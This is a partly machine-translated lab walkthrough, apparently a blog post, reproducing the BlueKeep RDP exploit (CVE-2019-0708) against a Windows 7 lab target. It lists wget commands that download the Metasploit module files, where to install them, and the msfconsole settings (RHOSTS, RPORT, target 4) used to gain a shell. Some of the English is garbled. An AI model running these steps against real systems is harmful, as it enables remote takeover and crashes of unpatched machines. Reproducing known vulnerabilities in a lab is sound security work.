CVE-2019-0708 exploits reproducibility
This vulnerability burst out from there for several months, until busy did not have time to write the document, now re-do it again.
Prepare the environment:
win7靶机 IP地址:172.16.15.118
Kali攻击机 IP地址:172.16.15.50
It should be reminded that msf tools on the machine to the latest kali, or load cve-2019-0708, when the module will not see
Download Vulnerability module
# 直接在kali中使用命令下载
wget https://raw.githubusercontent.com/rapid7/metasploitframework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
Once you have downloaded the file as follows:
Move the file to the specified location:
rdp.rb 移动到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录
rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploitframework/modules/auxiliary/scanner/rdp 目录
cve_2019_0708_bluekeep_rce.rb 放进/usr/share/metasploitframework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。
Environmental ready
Exploit
Msfconsole first enter into the framework msf attack
Enter reload_all the module is reloaded
Enter search cve-2019-0708 vulnerability query module we are going to use
Our vulnerability module has been successfully loaded into it
By use exploit / windows / rdp / cve_2019_0708_bluekeep_rce command module call
After entering the module inputs show options we need to set the parameters view
If you do not know the specific value of the parameter, then allows you to see through the show command
The setting:
设置靶机IP地址:set RHOSTS 172.16.15.118
设置攻击端口:set rport 3389
设置targets ID:set target 4
Use run command to attack or exploit
See here, we have successfully acquired the target of the shell
Summary and issues:
1. When the vulnerability that an attack is very easy to hit the drone will blue screen if you try several times without success, but not during the test on computer services
2. Loading Vulnerability module when it is loaded if not, it will be updated to the latest msf, re-copy the download again